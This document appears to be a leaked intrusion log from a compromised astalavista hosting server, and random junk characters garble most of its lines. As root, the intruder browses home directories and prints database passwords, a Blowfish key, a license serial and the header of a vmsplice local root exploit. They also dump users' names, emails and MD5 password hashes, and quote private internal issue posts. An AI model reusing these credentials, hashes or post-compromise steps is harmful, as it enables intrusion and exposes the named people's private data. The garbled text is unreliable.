# U( T5 {& t5 N( o-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout) C3 \0 i- `7 [- i- B& v' S: C8 B
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile" H# x( C2 D4 ^; T& L3 F
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc! i% R) e- ?  n+ I. g  j# h% Q
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains4 }0 g  ~3 s0 [3 p& l
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap1 o' e3 H: o4 ?: p! {: I
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail' c' `. t- A6 A
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
0 b( S1 h) X$ Q' `6 ?% W; K$ Rlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
  i7 {! \* o: k$ w( S-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow5 O# i( C, j0 R

4 e1 t- g$ y9 ?sh-3.2# cd auth/( p3 I, W  @5 x! D, E
sh-3.2# ls -la
/ q/ d& [9 K/ H2 ]8 h* ytotal 28
% K) t2 p: F+ l% [7 ~% r" p) I3 Z  i1 sdrwxr-xr-x 2 root    root    4096 Dec 23 16:00 .' v& r) ~% r: L. A" R) u
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
( F4 M& F3 _5 D' e8 m- Q6 v-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php4 [9 J5 j" j/ E9 w
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php6 z- Y: r5 k/ [1 B) s6 R7 H
-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
; B) [) H* O! f7 ?/ G# |$ e-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting( u' S: `% Q4 n% \" z" i: O0 p
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd5 w* P9 S1 V+ J" B" T0 ?, {
; m/ m% j: h1 a' y
sh-3.2# cat hackercontest.config.inc.php
+ s; \$ ?5 [0 M0 i, a<?PHP
8 t( n: ~. X2 `0 o// Variabeln f?r Verbindung zur Datenbank //4 l7 f0 X  {, t+ x! o) x4 ]
$conxHost = ‘localhost’;                       // MySQL hostname0 e4 w- E7 K  W
$conxUser = ‘hackercontest’;                                       // MySQL user& T0 @8 [. ?( i8 e1 g; A
$conxPassword = ‘K6m@7dUc’;                    // MySQL password3 [3 ?) Q( }" E  Y( p5 o' j6 ?
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
" e# b1 W- M, K) w3 o?>
, M/ k' o' I" u' K5 x) P) j, ysh-3.2# cat hosting.config.inc.php
; G% U) T4 p. S$ w) i- p- j- }/ l# f' d<?PHP
% ]# U& z. R! b// Variabeln f?r Verbindung zur Datenbank //% j" I; q6 l4 G9 k9 r- i, \% I
$conxHost = ‘localhost’;                       // MySQL hostname
8 N& l( Z# q' x- [7 d' T% @$conxUser = ‘hostinguser’;                                 // MySQL user. d# k7 @$ A) r) Z0 u8 ]
$conxPassword = ‘cXvB3981′;                    // MySQL password" w+ q9 r8 I  ~4 m/ q
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish$ w( \% ?7 \, p' G" V/ g! G; g# U
?>
, ]& ]" |2 p4 W2 B
( i8 X! A  a- Y5 r  |' wsh-3.2# cd ..4 T$ N; c0 v+ S, r$ P. ?
sh-3.2# cd com
& ?9 J$ \4 c- r5 o0 q- Esh-3.2# ls -la
4 o4 G5 Q, [0 S) Ototal 141208
7 {! B1 E" [# ]( S9 s# x1 P  _drwx–x–x 10 com  com       4096 Apr 28 12:40 .0 y- x$ U8 m- L  i
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..; _2 w; F" N3 J
drwx——  2 com  com       4096 Jun  4 04:04 backups
( s& h4 ^+ |  }0 ?% A% I9 R-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
, Q( Q+ O% L- R4 F, `; k1 c5 }drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
* p9 a2 j1 D# _7 L4 R-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history& V6 ^0 Q+ u  Z/ ^
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout. x" e# E& A* \% Y" q
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile% y4 f! z5 R3 c8 j' }
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
* i0 g5 F: m! U+ S( K: M1 Qdrwx–x–x  3 com  com       4096 Jan 29  2008 domains/ c# i2 j: V& q, O- `. t
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed" h6 E# E* E1 o' Z! m/ w! j
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
% ~% m" Q: A) y+ D$ y3 E-rw——-  1 com  com         69 Nov 18  2008 .lesshst+ s  c4 A; b5 V. G0 X1 [9 R- \( [# G
drwx——  2 com  com       4096 Sep 24  2007 mail
5 ]8 L* ]2 |/ C2 I/ Z7 F: e3 i( M% |-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history3 P6 E- N6 T5 z8 Q8 H; J
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp. R: Y2 k$ u2 R( G6 i  `7 V  S
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
; H6 r$ M, @1 U; h9 T+ K# ]-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow3 f* \/ v+ R% x; q7 k) ~1 Z/ C
drwx——  2 com  com       4096 Aug 26  2008 .ssh4 P9 b/ N# Z# E- [7 z% i
-rwx——  1 com  com       8515 Feb 10  2008 t! Z2 S$ a/ {' U4 J6 {
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c# U7 Y0 C" U- i2 A! a1 k5 k' J' c( ]
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
) T3 Y8 M. j& N" [! k4 y5 {$ ^-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
+ Q* [8 {( }5 x" @0 t-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql: U. R& D, h$ U
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
$ r% v2 h7 B9 |  C. A-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
2 w4 J& n# `. X( p5 p# m' J# X" {% j$ e/ z' P9 N* s* g  w
sh-3.2# head t.c
4 O" L  G0 a  ]$ k' y# B/ l5 C/*
0 Y3 d! L/ q4 [, `! W0 ^4 t0 F* jessica_biel_naked_in_my_bed.c$ [9 z# T& h- O% |3 H" K& Z! N2 Q9 N
*  [. y) b+ t9 C3 P3 a
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.$ |9 m8 o; x( b- z) r0 l
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.) ^1 I3 u( w1 O: X* K( m
* Stejnak je to stare jak cyp a aj jakesyk rozbite.4 L2 V- d. v7 d9 t6 Z
*
$ [3 U! c% u" ~  `* Linux vmsplice Local Root Exploit
" J+ c- ]" k: X2 `+ T7 w* By qaaz0 l- d) H* \7 u) r! _5 W7 e
*
! A& ^! W* N+ _1 @( l0 Y5 L' V+ w
sh-3.2# cd /
8 K9 M5 ~$ v; s! {1 dsh-3.2# ls -la
1 L% x) M) d* Htotal 3601 d( J" w& H7 X7 Y% e7 N
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .9 Y6 s2 n2 M2 {" d* o
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..9 Q* h; [8 u, p! t, _+ G  k
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
: I6 g4 D3 Q9 h+ E& E1 E( o-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
; }( d, r! T! {: f* P) B8 O-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
  c: a. S1 d. f3 U/ }$ E$ l2 R-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck- @, D" W' v" P/ ?4 o
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
8 T4 g+ S, Q  o, f8 @8 K( sdrwxr-xr-x   3 root root   4096 Dec 29  2007 backup7 E" ~8 d! x1 p6 R$ ?1 s: x. l
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin1 U  e% H1 }( x. H" K6 I
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
) v9 ~1 \: `1 V6 G% sdrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev  _% w  n- J; W2 z0 \& i. R. p
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc! n& z! @. X4 O1 b3 l( T
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
* u$ O# ^3 _8 ~-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf& l$ L5 X' S7 L# B+ e
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
1 `; ]' e6 l, V0 l3 p. P7 o4 idrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
; A1 s- d; C% |+ H( k5 idrwx——   2 root root  16384 Sep 11  2007 lost+found
$ o% Y. l4 i0 a, pdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media
% f2 }& A( ~# X: M' E! S7 Ldrwxr-xr-x   2 root root      0 Jun  3 02:43 misc
' c; R3 c: n  x, o2 Adrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt/ a  \2 s/ Y# m& y3 A8 ~
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg6 z3 h5 I" m; z# x, y, m2 v  x# L
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
5 ~! M; Y$ c9 R% odrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt9 ~" i* u! _. d8 L5 f8 p
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc: N9 c# [1 t6 x+ I9 c0 D6 j
drwxr-x—  15 root root   4096 Jun  4 08:40 root/ o7 g7 }( o5 e
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin+ Q* E% i' R- H% ?. C
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
$ U7 W* h0 S& p4 I1 f  @3 S8 Fdrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv! v9 R# u0 d! ?; T7 c$ H2 z
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys. E( G$ ^! g0 d9 M
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
7 r* T2 T4 s9 ?! zdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
3 D- V1 L; q4 \" k! h' w* h/ mdrwxr-xr-x  26 root root   4096 Jun  4 03:16 var' @) Q6 y) ~) g+ ]9 n3 p, O0 W  J

* R% K, F/ g, {9 W( B$ Ish-3.2# cd opt
/ Y+ B$ d* K+ E# J' i" `& csh-3.2# ls -la
1 [6 O, L0 f1 {. ?7 U% \! a: |- dtotal 20
  [% r8 {) k0 j- D0 O9 ldrwxr-xr-x  3 root root 4096 Mar 11 17:56 .8 {! z3 x: K1 v. `) `9 a
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
- S/ o: j) e5 z5 s5 c4 Ldrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws( l$ j% F3 I! @5 \) H2 Q

6 |6 R- N+ q& H1 X+ k# X8 T2 Dsh-3.2# cd lsws/
. @* ?$ T1 _' c0 @' f2 Hsh-3.2# ls -la
# @# ?" d4 F2 M5 J7 \: jtotal 1086 V5 L+ f1 f6 o, [
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
8 |9 ^& m; x( _drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..0 C9 v& t7 ?$ p, J( W$ |
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons1 R6 y- T; J7 R9 i0 T$ P, d; _
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
* s5 w/ Y1 ]. N7 w3 tdrwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate  _- \" T7 c+ N1 i1 D
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin+ A  [% t8 u  T0 D
drwx——  4 apache apache  4096 Jun  3 02:43 conf
" e0 z6 ?. N; O2 vdrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
; _+ i6 l0 S6 Y5 g* Edrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs' A" L! k# [3 n+ |) `6 N6 F" c$ P
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin- z9 G+ a/ F' Q9 s' b' |: e
drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib1 b/ g5 c' m9 z* B5 p4 k
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
7 h  l  {; Y4 ^3 ?6 v0 B6 J-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP9 X$ A. W$ r/ f1 O; h2 `4 ?
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL+ l- E% ]* C8 o2 ~6 e" c$ q
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP
. V" d: ]5 A) X6 f3 {6 u9 zdrwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs" I5 }: }8 O6 w' y. d- I3 h
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
! O8 r! z+ r" B- Z; x7 hdrwx——  2 apache apache  4096 Mar 20  2008 phpbuild0 i: O7 d# \/ f6 \; X# B
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share7 h- T, Z. F1 T$ U# L0 i% u* H! b
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION# p! A  k# U+ e9 G  Y1 f9 m5 j
5 `# W# C- p% X2 S
sh-3.2# cd conf3 ~7 V9 S, H4 @9 r. ~1 D0 O7 K
sh-3.2# ls -la) `* G2 c. o  r9 X; [
total 48
9 U% N( {8 a3 l& mdrwx——  4 apache apache 4096 Jun  3 02:43 .
  L2 C5 z1 c0 f9 S3 }drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..# e' Z8 Q8 _4 [, u
drwx——  2 apache apache 4096 Mar 20  2008 cert# Z  I, K8 j2 I3 \) D  {7 ^4 Y8 r% P
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml4 c, V3 @# j& m% O! o9 ]
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak' d4 z+ P: @) s3 V  n- g
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
) E: r8 e+ y7 B3 l6 W-rw——-  1 apache apache  256 May 29 15:10 license.key
, y1 G  \7 g( T+ q8 z  y-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
" L, ^' `$ Q, B( N-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties! ?# [1 a4 g) X8 X2 @6 F) l
-rw——-  1 apache apache   20 May 29 15:10 serial.no
1 w3 h& D0 }) B3 ?  l' w0 O# D$ Q  odrwx——  2 apache apache 4096 Mar 20  2008 templates# N) F4 m; X. V" H1 H- U% X

# w/ k8 \. ^( Y( jsh-3.2# cat serial.no
7 ?0 c8 s" S* K: c, R* QIbDl-oVsO-CKqL-wVRa
* W6 I7 c9 ]/ s# }$ H
! K# j# Y" G7 rsh-3.2# mysql
% c0 A/ I( F% b) o! o1 ^" eWelcome to the MySQL monitor.  Commands end with ; or \g.
" @6 a2 q1 |6 E6 m4 E' MYour MySQL connection id is 286844  Y* F; R' n2 \+ v; G2 n
Server version: 5.0.45-community-log MySQL Community Edition (GPL)3 ?4 d- t6 R* t- y1 R
! \: P( }# p. d' z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
4 @& h& ?4 {7 {7 r- k/ \; S7 W- E: u& {) W9 v5 j0 E  w
mysql> show databases;; r; B# t9 w3 b+ s$ ?" O% \
+———————–+
3 ^. i8 x6 J& |' l+ J' f| Database              |
' F% t  N' X2 W% K" t+———————–+1 _0 {. t& q+ r. S) H! n' J
| information_schema    |+ W! F" F, G3 x) b; }! `3 z
| astanet_ads           |) Q+ I- g  A( x
| astanet_mailing_lists |" X# C# S" ~4 [9 F9 j
| astanet_mediawiki     |0 w7 T! j: B! ~4 z/ r+ v* F+ K3 [4 N
| astanet_membersystem  |& p( D( @; c( k5 ~7 c1 a: M
| com_contrexx          |; i7 k% _4 b2 v# ?
| com_contrexx2         |
& C# V* e" U# P6 P* V  |' b| com_contrexx2_live    |
" ^9 |  @2 z8 Q+ T: {& C- y( H/ J| da_roundcube          |' H" F2 e( G: K3 j7 e
| dolphin               |
, L, ?2 f' q1 V$ g4 L, C| ideapool              |
1 J7 ?, t3 s% T% P% \( V& I7 j| mysql                 |+ `* m4 r/ {# C1 p
| test                  |0 ^' `$ t& c; s2 L! G
| yourmaster            |- _6 U6 ~+ s+ o4 Y% ?+ L
+———————–+
& e! c( q. u. e" K$ i% B/ h14 rows in set (0.00 sec)
2 j. m4 j5 b# w4 n6 A/ u. q# f3 I9 |, e$ f& D
mysql> use ideapool7 D) N8 g" A* @; v
Database changed
* R! `, k: c3 x1 G6 U2 S/ Lmysql> show tables;5 e2 h; ]% b# x7 M
+———————————–+
' F6 c7 o- S7 L: c9 j- v% j| Tables_in_ideapool                |
7 W4 x& J' A3 A  E! {+———————————–+- K. n# P9 g0 m) N( x% [
| eventum_columns_to_display        |' j% T! H* P2 {: J
| eventum_custom_field              |
9 S- o" s# c- W6 |  y7 i" U| eventum_custom_field_option       |
" \3 _( T' U6 M! \3 G3 x! @| eventum_custom_filter             |
7 z% m% g8 z" Q0 f* u; }% M& x| eventum_customer_account_manager  |0 U% }3 t) v/ y" m- p4 H  H) N) z
| eventum_customer_note             |
8 z# b% `; J4 y, U4 G| eventum_email_account             |
% i  ]( \7 N0 O( I2 @| eventum_email_draft               |/ C6 o0 L7 T6 f% B+ E
| eventum_email_draft_recipient     |
3 p' H  K2 I  S6 Y" j$ j0 z| eventum_email_response            |
& e' k* H  X) Z7 l) k| eventum_faq                       |
4 \) {$ |5 I& q! u' g$ E" l| eventum_faq_support_level         |. S) W) Q' y6 H% @1 z, k& \
| eventum_group                     |
+ E- o9 C" H9 H, j6 M, ]| eventum_history_type              |2 \5 c) q4 i8 h" o
| eventum_irc_notice                |4 A- D$ ?$ I" K( e3 p
| eventum_issue                     |  `) T0 ]$ _. v* ~0 v( t
| eventum_issue_association         |! w7 W; h3 S  ^/ X
| eventum_issue_attachment          |9 A3 R( `# P; J/ p
| eventum_issue_attachment_file     |
: u! P/ K/ d1 Q' P. N, l" ~  Z, S| eventum_issue_checkin             |4 [/ Y& `  ]- f* W. X
| eventum_issue_custom_field        |! X! M  S; d# e! l2 T4 r* X
| eventum_issue_history             |
7 |: D8 }( h; ?7 M6 ^  T# b' `5 r| eventum_issue_quarantine          |4 {- _, J" F5 U/ M% p5 p, m, Q
| eventum_issue_requirement         |
& j4 ^+ a* L  _2 e: S| eventum_issue_user                |6 E# c3 ], |  r' d! W
| eventum_issue_user_replier        |, i1 j$ c! V1 b& U1 e" Q+ f' m5 c
| eventum_link_filter               |5 v2 ?" B/ S& k# H2 Z
| eventum_mail_queue                |
4 \0 m) h3 V, M, b# C| eventum_mail_queue_log            |
5 y! ^' Z1 A3 a, x| eventum_news                      |
; h5 F5 _2 {2 a5 s4 s| eventum_note                      |3 E2 I3 K$ Y5 C, ~4 T$ D5 T
| eventum_phone_support             |
* Z2 k1 l& G  ]- w6 [| eventum_project                   |& p  z) T- F. H7 c
| eventum_project_category          |% f/ W) Z: I) V+ w8 _
| eventum_project_custom_field      |2 s  q  w) U6 ~
| eventum_project_email_response    |
% h1 `6 e7 O6 r, ]% u| eventum_project_field_display     |' D5 H) s6 E( [& H( r6 v
| eventum_project_group             |
8 r2 w' C  X1 M5 x! w* H% U| eventum_project_link_filter       |
+ X# r& x) a2 J8 O3 Z4 `( l| eventum_project_news              |/ l3 F: g' Y6 N9 Z( K5 K
| eventum_project_phone_category    |
0 d6 h7 ?0 f) w| eventum_project_priority          |2 ]" G: |1 C6 L: J6 S0 v3 P9 X
| eventum_project_release           |, I! E; y+ j9 m. D- d2 Y# v
| eventum_project_round_robin       |- a) Q5 P3 Q) \, \  X8 k
| eventum_project_status            |
# K# h& o) P3 d! B| eventum_project_status_date       |3 d2 L: ]( n3 D+ d+ Z6 A
| eventum_project_user              |
; }' w5 I# I1 \) X| eventum_reminder_action           |
- s. \4 @6 I, z; p* E/ P8 W| eventum_reminder_action_list      |
5 V: E- y6 K4 ^5 K4 [" L3 b: @| eventum_reminder_action_type      |
8 p( f* v8 c, m  {3 T* B4 O| eventum_reminder_field            |. S$ W; i$ J& S3 P
| eventum_reminder_history          |
9 c. o9 c( J6 m- [5 ^| eventum_reminder_level            |
" X: F8 Q6 ^: }% z4 x| eventum_reminder_level_condition  |) G. A/ P" s4 {: G( x
| eventum_reminder_operator         |
& O" S% {4 ~0 [2 N( e. v; w| eventum_reminder_priority         |' C* f# m4 s& a1 N; ^- R
| eventum_reminder_requirement      |+ T& {( A! T8 v& Q* f" G5 V
| eventum_reminder_triggered_action |
1 Y- a; E4 i* ~4 f2 @3 J| eventum_resolution                |
% g; Z3 W  d. W" J$ J1 Y| eventum_round_robin_user          |
9 c, u3 F' h! @7 T| eventum_search_profile            |) R, f# X$ i1 ~
| eventum_status                    |' _9 W( j3 H6 ?
| eventum_subscription              |+ N7 w( V8 n  u+ k' @$ g6 c
| eventum_subscription_type         |
) j+ ~" Y- ~  N5 A$ s| eventum_support_email             |
( i# Q( E0 i! m5 P| eventum_support_email_body        |9 Y$ }+ ^7 F; M+ Y" {
| eventum_time_tracking             |
9 W$ \% g7 r! {7 M, I1 L3 g$ T/ _| eventum_time_tracking_category    |
7 y: N1 B+ Y& T& h$ C0 [. Y8 u| eventum_user                      |! H. i" B2 {6 W* `8 A
+———————————–+
' H  S5 z: j, V5 P* w69 rows in set (0.00 sec)
, @) J5 u% s3 h2 o1 y& {# T! F7 o& U9 g! s
mysql> describe eventum_user;$ v( a/ n  L) x& |! x% M
+————————-+——————+——+—–+———————+—————-+. p. Q+ s: Q6 f4 L
| Field                   | Type             | Null | Key | Default             | Extra          |& O: l. u0 W8 G2 k# \+ Q5 s
+————————-+——————+——+—–+———————+—————-+1 ~; O8 g: N6 j5 A) v  ?2 E9 A
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |5 T& j4 c! {: q% p
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
/ o: z  p/ R6 y2 C3 M9 o| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |) S: C  x6 u4 `& P2 A
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |2 R& }0 f% x% E/ g
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
/ Z) K5 X( C0 S, S' [. ?& }' f| usr_status              | varchar(8)       | NO   |     | active              |                |5 C- O* _% L9 G  z
| usr_password            | varchar(32)      | NO   |     |                     |                |
* y' Q+ q$ S& [5 U6 o9 q| usr_full_name           | varchar(255)     | NO   |     |                     |                |* J" H0 [1 G9 Q! W6 r" v7 `
| usr_email               | varchar(255)     | NO   | UNI |                     |                |# f( E( g) D1 M" @* c. F
| usr_preferences         | longtext         | YES  |     | NULL                |                |  f1 W$ x: ^: r9 O8 _- {/ o5 s
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
* F$ j. |* I7 E4 ~| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
: t: F- r; ~, S* `8 R/ p" D. a| usr_lang                | varchar(5)       | YES  |     | NULL                |                |3 ]2 K& @; @5 s% h
+————————-+——————+——+—–+———————+—————-+
. r" y- V' s# f, n" z, j* O13 rows in set (0.00 sec)
; k  F9 p. }* u$ ~& B0 Y8 L, L- H0 Y* S5 [/ X5 d1 g" ?
mysql> select usr_full_name,usr_email,usr_password from eventum_user;$ a) G  a8 g$ y' u' K
+———————-+——————————-+———————————-++ E2 W" v1 b  [/ f
| usr_full_name        | usr_email                     | usr_password                     |
8 z- \8 k' U3 j6 L0 P( b+———————-+——————————-+———————————-+
' `2 h  M/ t0 S. R, d| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |( K; J. S$ }3 ]: `& L6 T; P3 C& L
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |6 j  ~9 X, D' ]
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
" u) v1 A% ~. ?; _* ]| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
1 k1 l: o6 \8 Z2 ~' K8 d! ~$ K| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
4 p, u, A) R; U' s' s% w/ \" f# F| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |& H8 E; I: i0 }# C5 A
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |' e; L+ [- K: h6 h5 w
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
* g' T% S& Z( M2 M" y# z| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |: ?) P, L, Y1 b. q3 {* ^1 n
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
6 T, f$ T- i4 e$ {/ U| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |% s) e2 Y1 a! @! u$ l
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
# a5 C/ I0 p' B2 T| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |3 t. \( m2 M) D! k  r: E
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |/ n5 R: _) T; _' L% R
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |% Q! f6 y9 p0 _3 C1 p3 _
+———————-+——————————-+———————————-+2 o/ g% G% f# o; I3 K1 G9 }9 A
15 rows in set (0.00 sec)2 E6 r% ~8 h1 q! X7 \2 t
' d; T* C0 _9 L
mysql> select iss_description from eventum_issue where iss_id = 43;
: F/ o' k3 r! [( X9 ~" j" b- B' p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% M( V0 S4 Q6 k& ^. Q| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7 c+ y* O; n8 Z3 N
|, l3 P6 c3 N8 s+ X1 u$ T5 |
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! d$ M0 u5 l: u| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
% \) R4 l3 h7 k) L$ r6 C; m$ p! Nconnected for 90 mins… 120mins… so what i propose is something like:
) n" E7 f/ M0 ~2 Q) P3 i. a) o4 p8 Q- b链接标记[url]http://www.surfthechannel.com/[/url]! \5 H) y6 m  K( n- _: t
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system* j# m0 ~' X0 ^1 H" ^
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t2 ~" {! T. I  b6 Q8 U! R
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
+ P2 C8 q# `8 l: r$ \1 J: K3 vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
4 F5 d3 ], G* X) i8 r* I% |$ F1 j* c- g: B/ U* r$ |( b
We could also put advertisement during play on the flash video player itself… extra $$…2 n9 c; r( Z3 r! w7 B$ q# _4 j

4 r4 O: p- `5 W3 ^2 h; HBy sykadul |
3 ^0 v& C, x% D, O+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( ]: u6 ?$ O' c9 n7 k1 row in set (0.00 sec)
. {1 f, h, [# D' e1 c! v$ w1 ?* G
/ a2 o0 @5 E( \& ~* a" o/ V// Money and extra $$ is all they care about. remember that.7 h* a( Y- o3 t2 I# }
  e( S) q% M  m4 d& h
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;2 E4 U: F( o) i& k/ w
+————————+——————————————————————————————————————————————————————————————————————————————-+
4 L) y& m0 r6 Q0 w  P6 G: L| iss_summary            | iss_description                                                                                                                                                                                                                          / X% ]' |0 g' W" C
|
1 ~# R) s8 p3 ?4 [! K6 i+————————+——————————————————————————————————————————————————————————————————————————————-+
: b% c) a7 w& d0 l: y; [3 e- w3 a| Forum for REAL EXPERTS | Hello,
# D, I3 f# ]0 R& l0 F4 t& W( S, G! x( X) d' p
Ishtus and I,
) P" o( n3 v2 c8 p5 k
) k  e& {- L( X. k" h7 ]Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide2 w2 F! }: _, f7 [7 R, ^
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
, i! i- j: m4 B0 h- f5 W  T2 E( N6 C4 `4 u% P: w
One example a friend of mine from coresecurity.com!
/ x7 t- Z4 \3 ^
8 Q8 W; \2 S) V# H/ c0 t& TWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
